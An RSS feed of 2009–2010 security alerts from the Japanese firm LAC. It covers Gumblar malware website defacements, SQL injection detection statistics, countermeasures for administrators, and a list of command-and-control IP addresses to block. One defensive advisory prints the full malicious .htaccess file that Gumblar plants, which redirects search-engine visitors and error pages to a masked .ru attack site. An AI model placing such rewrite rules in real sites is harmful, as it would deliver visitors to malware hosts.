<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
    <channel>
        <title>LAC | セキュリティアラート</title>
        <link>http://www.lac.co.jp/info/alert/</link>
        <description>新しい攻撃手法の検知などの情報</description>
        <language>ja</language>
        <copyright>Copyright 2010</copyright>
        <lastBuildDate>Fri, 05 Mar 2010 17:30:44 +0900</lastBuildDate>
        <generator>http://www.sixapart.com/movabletype/</generator>
        <docs>http://www.rssboard.org/rss-specification</docs>
        
        <item>
            <title>川口洋のつぶやき 第2回03/05/2010 - K&apos;s Private Talk</title>
            <description><![CDATA[<p>JSOCチーフエバンジェリスト兼セキュリティアナリストとして活躍中している、川口洋のつぶやきをお届けします。今回は「GumblarとConfickerにつながるWaledac」と題してふたつの悪性コンピュータウイルスに共通する「Waledac」ボットネットに言及します。</p> <p>&nbsp;</p> <div class="ct"><object width="500" height="405"><param name="movie" value="http://www.youtube.com/v/tBATrIVY0Rg&hl=ja_JP&fs=1&"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/tBATrIVY0Rg&hl=ja_JP&fs=1&border=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="500" height="405"></embed></object></div> <div class="ct"><a target="_blank" href="http://twitter.com/lac_security"><img alt="follow me on twitter" width="500" height="70" src="/info/alert/img/followmeontwitter.gif" /></a></div>]]></description>
            <link>http://www.lac.co.jp/info/alert/ks_talk20100305.html</link>
            <guid>http://www.lac.co.jp/info/alert/ks_talk20100305.html</guid>
            
                <category domain="http://www.sixapart.com/ns/types#category">お知らせ</category>
            
            
            <pubDate>Fri, 05 Mar 2010 17:30:44 +0900</pubDate>
        </item>
        
        <item>
            <title>【注意喚起】Gumblar（ガンブラー）ウイルスによる新たなホームページ改ざん被害を確認</title>
            <description><![CDATA[<p><strong>※本注意喚起は、<a target="_blank" href="/info/alert/alert20091225.html">2009年12月25日【Gumblar（ガンブラー）ウイルスの組織内感染拡大とホームページ改ざん被害増加に伴う対策の確認】</a>の続報です。</strong></p>
<div class="inportantInfo">
<p class="dense"><a href="#gumblar_movie">2010年3月4日　「.htaccessを悪用した新たなGumblar攻撃」の解説動画を公開しました。</a></p>
</div>
<p>株式会社ラックでは、Apacheの設定ファイルである「.htaccess」の不正アップロードを行うGumblarウイルスの活動を複数サイトにおいて確認しました。現在判明していることは次のような内容です。</p>
<h3>【攻撃確認日】</h3>
<ul>
    <li>LACがこの攻撃を最初に認識したのは2010年3月1日です</li>
    <li>FTP転送のログから、少なくとも2010年1月上旬にはこの攻撃が発生していたと推測しています</li>
</ul>
<h3>【動作概要】</h3>
<p>この.htaccessファイルが置かれる影響は、主要検索サイトからのアクセス、および404、403などのエラーがApacheのリダイレクト機能で攻撃サイトに転送されることです。攻撃サイトに転送された後、他のGumblar攻撃と同様に、悪性プログラムの感染被害に遭われることが推測されます。</p>
<h3>【従来型Gumblarとの相違点】</h3>
<p>従来のGumblar攻撃と異なる点は、次の2点が判明しています。</p>
<dl> <dt>1. ユーザはJavaScriptの対策だけでは防げない</dt> <dd>Firefox + NoScriptの組み合わせでは防げない可能性があり、RequestPolicyなどのリダイレクト対策が可能なアドオンを利用する必要があります。</dd> <dt>2. コンテンツファイル監視だけでは気付くことができない</dt> <dd>コンテンツファイル自体は改ざんされておらず、さらにブックマーク（お気に入り）やURL直接入力でサイトを表示した場合は影響を受けないため、Webサイト管理者が被害に気付きにくい。</dd> </dl>
<h3>【Webサーバ管理者の対策】</h3>
<p>身に覚えのない.htaccessファイルが存在しないかを確認してください。FTP転送ログで.htaccessファイルがアップロードされていないかを確認するのも有効です。</p>
<p><em>確認されたログのサンプル</em></p>
<div class="inportantInfo">
<p class="dense">FTP<br />
Jan dd hh:mm:ss 2010 1 x.x.x.x 1278 /home/xxxx/.htaccess b _ i r xxxx ftp 0 * c</p>
<!-- /inportantInfo --></div>
<p>※現在のところ、トップディレクトリに単発でアップロードされていることを確認しています。</p>
<p><em>アップロードされる「.htaccess」ファイル</em></p>
<div class="inportantInfo">
<p class="dense">#  HostRule<br />
RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]<br />
RewriteRule ^(.*)$ http://********.ru/ [R=301,L]<br />
<br />
ErrorDocument 401 http://********.ru/<br />
ErrorDocument 403 http://********.ru/<br />
ErrorDocument 404 http://********.ru/<br />
ErrorDocument 500 http://********.ru/<br />
#  /HostRule <br />
<!-- /inportantInfo --></p>
</div>
<p>&nbsp;</p>
<p><a name="gumblar_movie"> </a></p>
<div class="ct"><object width="500" height="405">
<param name="movie" value="http://www.youtube.com/v/Bqz4w5se_UU&hl=ja_JP&fs=1&"></param><param name="allowscriptaccess" value="always"></param>
<embed src="http://www.youtube.com/v/Bqz4w5se_UU&hl=ja_JP&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="500" height="405"></embed></object></div>
<div class="ct"><a target="_blank" href="http://twitter.com/lac_security"><img alt="follow me on twitter" width="500" height="70" src="/info/alert/img/followmeontwitter.gif" /></a>
</div>
<p>&nbsp;</p>
<p><em>【本注意喚起に関するお問い合わせ先】</em><br />
株式会社ラック　サイバー救急センター<br />
電話：03-5537-0119 / E-Mail: p119@lac.co.jp</p>
<p class="rt">以上</p>
]]></description>
            <link>http://www.lac.co.jp/info/alert/alert20100303.html</link>
            <guid>http://www.lac.co.jp/info/alert/alert20100303.html</guid>
            
                <category domain="http://www.sixapart.com/ns/types#category">注意喚起</category>
            
            
            <pubDate>Wed, 03 Mar 2010 11:00:00 +0900</pubDate>
        </item>
        
        <item>
            <title>川口洋のつぶやき 第1回02/26/2010 - K&apos;s Private Talk</title>
            <description><![CDATA[<p>JSOCチーフエバンジェリスト兼セキュリティアナリストとして活躍している、川口洋のつぶやきをお届けします。突然の開始にもかかわらず、週1本のペースを目指して更新していきたいと思っています。</p><p>さて、初の試み、第1回めの「川口洋のつぶやき」は...?!</p> <p>&nbsp;</p> <div class="ct"><object width="500" height="405"><param name="movie" value="http://www.youtube.com/v/Hz5NF6BkzHs&hl=ja_JP&fs=1&border=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/Hz5NF6BkzHs&hl=ja_JP&fs=1&border=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="500" height="405"></embed></object></div> <div class="ct"><a target="_blank" href="http://twitter.com/lac_security"><img alt="follow me on twitter" width="500" height="70" src="/info/alert/img/followmeontwitter.gif" /></a></div>]]></description>
            <link>http://www.lac.co.jp/info/alert/ks_talk20100226.html</link>
            <guid>http://www.lac.co.jp/info/alert/ks_talk20100226.html</guid>
            
                <category domain="http://www.sixapart.com/ns/types#category">お知らせ</category>
            
            
            <pubDate>Fri, 26 Feb 2010 18:00:00 +0900</pubDate>
        </item>
        
        <item>
            <title>SQLインジェクション攻撃検知数（2009年12月まで）</title>
            <description><![CDATA[<p class="ct"><a href="/info/alert/img/sql_injection_20100106.gif"><img alt="SQLインジェクション攻撃検知数（2009年12月）" width="354" height="237" src="/info/alert/img/sql_injection_20100106_s.gif" /></a><br />
（クリックで拡大）</p>
<p>2009年12月1日〜12月31日までのJSOCで検知したSQLインジェクション攻撃の検知数は、30,083件でした。</p>
<p>以下は2008年1月からの月別のSQLインジェクション攻撃検知数です。</p>
<table summary="">
    <thead>
        <tr>
            <th width="14.2%">&nbsp;</th>
            <th scope="col" width="14.2%">1月</th>
            <th scope="col" width="14.2%">2月</th>
            <th scope="col" width="14.2%">3月</th>
            <th scope="col" width="14.2%">4月</th>
            <th scope="col" width="14.2%">5月</th>
            <th scope="col" width="14.2%">6月</th>
        </tr>
    </thead>
    <tbody>
        <tr>
            <td class="ct">2008年</td>
            <td class="ct">23,409</td>
            <td class="ct">21,024</td>
            <td class="ct">34,769</td>
            <td class="ct">51,252</td>
            <td class="ct">157,407</td>
            <td class="ct">99,088</td>
        </tr>
        <tr>
            <td class="ct">2009年</td>
            <td class="ct">1,508,852</td>
            <td class="ct">138,960</td>
            <td class="ct">285,548</td>
            <td class="ct">107,282</td>
            <td class="ct">98,724</td>
            <td class="ct">62,014</td>
        </tr>
    </tbody>
</table>
<table summary="">
    <thead>
        <tr>
            <th width="14.2%">&nbsp;</th>
            <th scope="col" width="14.2%">7月</th>
            <th scope="col" width="14.2%">8月</th>
            <th scope="col" width="14.2%">9月</th>
            <th scope="col" width="14.2%">10月</th>
            <th scope="col" width="14.2%">11月</th>
            <th scope="col" width="14.2%">12月</th>
        </tr>
    </thead>
    <tbody>
        <tr>
            <td class="ct">2008年</td>
            <td class="ct">149,888</td>
            <td class="ct">174,996</td>
            <td class="ct">240,121</td>
            <td class="ct">266,257</td>
            <td class="ct">151,736</td>
            <td class="ct">15,027,791</td>
        </tr>
        <tr>
            <td class="ct">2009年</td>
            <td class="ct">60,638</td>
            <td class="ct">53,613</td>
            <td class="ct">34,761</td>
            <td class="ct">40,298</td>
            <td class="ct">44,090</td>
            <td class="ct">30,083</td>
        </tr>
    </tbody>
</table>
<p class="rt">以上</p>
<p>&nbsp;</p>
<p><a href="/jsoc/pentest/1st-websecurity.html"><img alt="Webセキュリティ診断・初診コース" width="567" height="54" src="/info/alert/img/1st-websecurity_bnr.gif" /></a></p>]]></description>
            <link>http://www.lac.co.jp/info/alert/alert20100106.html</link>
            <guid>http://www.lac.co.jp/info/alert/alert20100106.html</guid>
            
                <category domain="http://www.sixapart.com/ns/types#category">お知らせ</category>
            
            
            <pubDate>Wed, 06 Jan 2010 17:56:48 +0900</pubDate>
        </item>
        
        <item>
            <title>【注意喚起】Gumblar（ガンブラー）ウイルスの組織内感染拡大とホームページ改ざん被害増加に伴う対策の確認</title>
            <description><![CDATA[<p><strong>※本注意喚起は、2009年11月19日<a target="_blank" href="http://www.lac.co.jp/info/alert/alert20091119.html">【Gumblarおよびその亜種に関する大量の感染事例について】</a>の続報です。</strong></p> <p>2009年11月19日<a target="_blank" href="http://www.lac.co.jp/info/alert/alert20091119.html">【Gumblarおよびその亜種に関する大量の感染事例について】</a>として、当社のセキュリティ監視センターJSOCから注意喚起を行いましたが、収束に向かう気配がありません。また、先日、JR東日本のWebサイト改ざんの報道に代表されるWebサイト改ざんは、このGumblarに感染したパソコンを通じて行われており、今後もますますの被害拡大が懸念されるため、注意喚起を行うこととしました。</p> <p>組織内部のウイルス感染を放置することは、単に組織内部の情報が漏えいするだけではなく、被害が外部に対して顕在化してしまう恐れがあります。この顕在化とは、関係するWebサイトが改ざんされ、対策のために停止を行ったり、多くの利用者が感染の被害に遭われ、二次被害・三次被害と拡大していくことです。</p> <p>一方、Webサイト改ざんでどの程度の事業インパクトがあるかは、その組織やWebサイトの性質により異なりますが、単に「もとに戻せば良い」程度の意識でいる組織が大半だと推測されます。実際には、利用者からの問い合わせや、苦情、被害の実態把握やその対策の告知、さらに個人情報漏えいの有無の調査や関連機関との連絡や調整など、その被害は広範囲に広がります。当然のことながら、被害拡大防止の観点からサイトは停止し、安全が確認されるまでは再開できないこととなるのが一般的です。</p> <p>さらに、多くの組織でのウイルス対策は「ウイルスの駆除」という意識が高く、本来的な被害防止の観点で対策が立てられていない組織も多々存在します。そのため、駆除という「もぐらたたき作業」に没頭しているうちに、被害が顕在化してしまう危険性も高いと判断しています。</p> <h3>【各役割別、Gumblarへの対策ポイント】</h3> <p>※ 株式会社ラック並びに関係者は、この注意喚起による如何なる損害、損失、賠償などの責任を負いません。対策は自己の責任において実施ください。</p> <dl>   <dt>システム管理者</dt>      <dd> <ul>     <li>自社のWebサイトの管理を行っているパソコンとその周辺のパソコンの安全性の確認</li>     <li>Webサイト更新のプロセスを把握して、安全性の確認や、第三者による成りすましの排除（アクセス制御）</li>     <li>内部ネットワークにおける感染パソコンの把握（監視）と、被害拡大防止策の適用</li>     <li>ウイルス駆除方法の確認とその適用</li>     <li>異変に気付いた際の対応方法の確認</li> </ul> </dd> <p>&nbsp;</p> <dt>Webサイト管理者</dt>     <dd> <ul>     <li>Webサイトが改ざんされていないかのチェック<br />     記述した覚えの無いJavaScriptやiframeタグがないかチェックを推奨</li>     <li>更新ファイルの安全性確認</li>     <li>使用しているパソコンが感染していないかオンラインチェックの実施（インストールしているウイルス対策ソフトでのチェックに加えて実施）</li>     <li>利用者や外部の方からの問い合わせ時の対応方法の確認</li>     <li>異変に気付いた際の対応方法の確認</li> </ul> </dd> <p>&nbsp;</p> <dt>Web制作やシステム開発を行う業者</dt>     <dd> <ul>     <li>開発、更新、運用を行っているパソコンと対象Webサイトや契約内容の把握（ビジネスインパクトの把握）</li>     <li>使用しているパソコンが感染していないかオンラインチェックの実施（インストールしているウイルス対策ソフトでのチェックに加えて実施）</li>     <li>クライアント（Webサイトオーナー）からの問い合わせ時の対応方法の確認</li>     <li>異変に気付いた際の対応方法の確認</li> </ul> </dd> <p>&nbsp;</p> <dt>ホスティング事業者</dt>     <dd> <ul>     <li>運用を行っているパソコンとお客様の数や契約内容の把握（ビジネスインパクトの把握）</li>     <li>使用しているパソコンが感染していないかオンラインチェックの実施（インストールしているウイルス対策ソフトでのチェックに加えて実施）</li>     <li>管理パソコンの使用制限（Webサイトの閲覧禁止）</li>     <li>テナントからの問い合わせ時の対応方法の確認</li>     <li>異変に気付いた際の対応方法の確認</li> </ul> </dd> <p>&nbsp;</p> <dt>一般利用者</dt>     <dd> <ul>     <li>FTPにて管理しているWebサイトがあるか、金銭に関係する情報（カードデータやユーザIDやパスワード）を取り扱っているかを把握</li>     <li>使用しているパソコンが感染していないかオンラインチェックの実施（インストールしているウイルス対策ソフトでのチェックに加えて実施）</li>     <li>使用しているWindowsや、Office製品、Adobe ReaderやAdobe FlashPlayerなどのコンテンツ閲覧・編集ソフトなどを最新の状態に保つ<br />     ※ 最新であるのかの確認は、MyJVNバージョンチェッカの活用（JVN）が有効的です<br />     <a target="_blank" href="http://jvndb.jvn.jp/apis/myjvn/#VCCHECK">http://jvndb.jvn.jp/apis/myjvn/#VCCHECK</a></li> </ul> </dd> </dl> <h3>【Gumblarとは】</h3> <p>※基本的な挙動に関しては2009年11月の<a target="_blank" href="http://www.lac.co.jp/info/alert/alert20091119.html">注意喚起</a>より変化はありません。攻撃コードが置かれた悪性サイトにアクセスしたユーザに攻撃を行います。アクセスしたパソコンで利用しているソフトウェアが最新でない場合、感染する可能性があります。</p> <p>感染後には以下のような挙動を行います。</p> <table summary="">     <thead>         <tr>             <th scope="col">Gumblarの挙動</th>             <th scope="col">ビジネスリスク</th>         </tr>     </thead>     <tbody>         <tr>             <th scope="row">FTPに利用するアカウント情報を盗み、そのアカウント情報を悪用してWebサイトを改ざん</th>             <td>信用の失墜、対応コスト増大</td>         </tr>         <tr>             <th scope="row">感染パソコンのウェブアクセス履歴の漏えい</th>             <td>情報漏えい</td>         </tr>         <tr>             <th scope="row">他組織のWebサイトを改ざん</th>             <td>不正アクセスへの加担</td>         </tr>         <tr>             <th scope="row">ウイルス対策ソフトのアップデート機能を妨害</th>             <td>一度感染するとそのパソコンの対策ではウイルス被害を発見できない</td>         </tr>     </tbody> </table> <p>特に最近はウイルス対策ソフトを導入済みのお客様での被害が目立っています。また、IDS/IPSにも検知されないように通信の難読化が施されており、感染原因となった通信を検知していません。攻撃者は一般的なセキュリティ対策を回避できることを確認して攻撃している可能性が高いことを示しています。残念ながら既存のセキュリティ技術（ウイルス対策ソフト、IDS/IPS、FireWallなど）による予防的対策ではウイルスの侵入を防御できておらず、予防策だけではなく事後策を必ず検討する必要があります。</p> <h3>【Webサイト改ざんによる被害】</h3> <p>※基本的な挙動に関しては2009年11月の注意喚起より変化はありません。企業の顔であるWebサイトが改ざんされた場合、以下のような影響がありますので注意してください。</p> <dl>   <dt></dt>      <dd> <ul>     <li>Webサイト利用者からの問い合わせ</li>     <li>検索エンジンの検索結果に「危険サイト」である指定</li>     <li>アフィリエイトやポータルサイトからのリンク切断</li>     <li>メディアの問い合わせ、報道</li>     <li>株価への影響</li> </ul> </dd> </dl> <h3>【JSOC顧客全体におけるGumblarの被害状況】</h3> <p>JSOCのお客様全体のうちGumblar感染通信を確認した割合：10%<br /> ※注意※Webサイトが改ざんされた被害の割合ではありません。</p> <h3>【Gumblarを含むウイルス対策の考え方】</h3> <p>パソコンに導入されているソフトウェアが全て最新のバージョンであれば被害を受けません。大きな組織において全てのパソコンのソフトウェアを最新の状態に保つことが難しい場合には、感染を予防する対策と共に感染した後の対策を必ず検討してください。</p> <dl><dt>パソコンでの予防策</dt>   <dd> <p>パソコンに導入しているソフトウェアを最新の状態にしてください。利用しているソフトウェア製品のバージョン確認のためには<a target="_blank" href="http://jvndb.jvn.jp/apis/myjvn/#VCCHECK">「MyJVNバージョンチェッカ」</a>で確認することも可能です。</p> </dd> <p>&nbsp;</p> <dt>Gumblarの通信先IPアドレス一覧（2009年12月25日9時 時点）</dt>   <dd> <p>JSOCで確認しているインシデントの99%は以下のIPアドレスに対して通信が行われています。今後も通信先のIPアドレスは変化する可能性がありますが、現時点では以下のIPアドレス宛の通信をファイアウォールやProxyで遮断することで根本対策を講じるまでの間の被害を軽減することが可能です。</p> <p>感染した際にアクセスする送信先のIPアドレス：<br /> <em> 67.212.81.67<br /> 67.215.237.98<br /> 67.215.238.194<br /> 67.215.246.34<br /> 91.215.156.74<br /> 91.215.156.75<br /> 91.215.156.76<br /> 94.76.250.73<br /> 94.229.65.174<br /> 193.104.12.20<br /> 195.24.76.250<br /> 210.51.166.228<br /> 216.45.48.66<br /> </em></p> </dd> <p>&nbsp;</p> <dt>FTPサーバでの予防策</dt>   <dd> <p>Webサイトの開発者やお客様システムの開発をしている事業者は以下の点を確認してください。</p> <ul>     <li>開発用、コンテンツ更新用パソコンの感染状況を確認（上記IPアドレスへの通信の状況確認とオンラインスキャンの実行）</li>     <li>使用しているソフトウェアが最新の状態であるかを確認</li>     <li>FTPサーバのログイン履歴に普段利用しないIPアドレスからのログインがないかを確認</li>     <li>Webサイトのコンテンツに不審な文字列が追加されていないかを確認</li> </ul> </dd> <p>&nbsp;</p> <dt>Gumblarに感染したパソコンの対策</dt>   <dd> <ul>     <li>感染パソコンを隔離し、OSごと再インストール</li>     <li>再インストールが難しい場合は、最低限FTPサービスへアクセスできるアカウントの変更とアクセス制御を行う</li> </ul> </dd> <p>&nbsp;</p> <dt>改ざんされたWebサイトでの対策</dt>   <dd> <ul>     <li>Webサイトを閲覧したユーザの調査およびユーザに対する注意喚起</li>     <li>該当のサーバにおける情報漏えいの可能性の調査</li>     <li>被害範囲を確認できるまではFTPサービスの利用を制限</li>     <li>改ざんされたコンテンツの確認と回復</li>     <li>悪用されたアカウントのID/パスワードを変更</li>     <li>FTPサービスを利用できるIPアドレスを必要なものにのみ制限</li>     <li>他の管理サイトの被害の有無を確認</li> </ul> </dd> </dl> <p>&nbsp;</p> <h3>【Gumblarの亜種の可能性】</h3> <p>Gumblarに感染したパソコンは攻撃者によって自由にアップデート可能です。 今後以下のような機能が実装される可能性があります。</p> <ul>     <li>内部ネットワークのパソコンへの感染機能</li>     <li>FTP以外のアカウント情報の漏えい（技術的にはウェブメールやクラウドサービスのアカウントを取得するように改造することも可能です。）</li>     <li>Gumblar感染パソコンを経由した内部からのWebサイト改ざん（FTPサーバでのアクセス制御の効果がなくなります。）</li> </ul> <p>&nbsp;</p> <p><em>【本注意喚起に関するお問い合わせ先】</em><br /> 株式会社ラック　サイバー救急センター<br /> 電話：03-5537-0119 / E-Mail: p119@lac.co.jp</p> <p class="rt">以上</p> <!-- /inportantInfo --> <div class="inportantInfo lv2"><p class="dense"><em>【参考URL】</em></p> <ul>     <li>【注意喚起】Gumblarおよびその亜種に関する大量の感染事例について（ラック）<br />     <a target="_blank" href="http://www.lac.co.jp/info/alert/alert20091119.html">http://www.lac.co.jp/info/alert/alert20091119.html</a></li>     <li>Web サイト経由でのマルウエア感染拡大に関する注意喚起（JPCERT/CC）<br />     <a target="_blank" href="http://www.jpcert.or.jp/at/2009/at090023.txt">http://www.jpcert.or.jp/at/2009/at090023.txt</a></li>     <li>ウイルス感染を防ぐためのポイント（IPA情報処理推進機構）<br />     <a target="_blank" href="http://www.ipa.go.jp/security/personal/know/virus.html">http://www.ipa.go.jp/security/personal/know/virus.html</a></li>     <li>How to remove malware belonging to the family Trojan-PSW.Win32.Kates（Kaspersky Lab）<br />     <a target="_blank" href="http://support.kaspersky.com/viruses/solutions?qid=208280701">http://support.kaspersky.com/viruses/solutions?qid=208280701</a></li>     <li>MyJVN バージョンチェッカの起動（JVN）<br />     <a target="_blank" href="http://jvndb.jvn.jp/apis/myjvn/#VCCHECK">http://jvndb.jvn.jp/apis/myjvn/#VCCHECK</a></li> </ul> <p class="dense"><em>【参考URL（オンラインスキャン）】</em></p> <ul>     <li>トレンドマイクロ<br />     <a target="_blank" href="http://www.trendflexsecurity.jp/housecall/">http://www.trendflexsecurity.jp/housecall/</a></li>     <li>カスペルスキー<br />     <a target="_blank" href="http://www.kaspersky.co.jp/virusscanner">http://www.kaspersky.co.jp/virusscanner</a><br />     以下の Nifty のサイトでもカスペルスキーのスキャンは実施可能です。<br />     <a target="_blank" href="http://www.nifty.com/security/vcheck/kav/kavwebscan.html">http://www.nifty.com/security/vcheck/kav/kavwebscan.html</a></li>     <li>マカフィー<br />     <a target="_blank" href="http://home.mcafee.com/Downloads/FreeScan.aspx">http://home.mcafee.com/Downloads/FreeScan.aspx</a></li>     <li>シマンテック<br />     <a target="_blank" href="http://www.symantec.com/region/jp/securitycheck/">http://www.symantec.com/region/jp/securitycheck/</a></li> </ul> <!-- /inportantInfo --></div>]]></description>
            <link>http://www.lac.co.jp/info/alert/alert20091225.html</link>
            <guid>http://www.lac.co.jp/info/alert/alert20091225.html</guid>
            
                <category domain="http://www.sixapart.com/ns/types#category">注意喚起</category>
            
            
            <pubDate>Fri, 25 Dec 2009 16:37:46 +0900</pubDate>
        </item>
        
    </channel>
</rss>
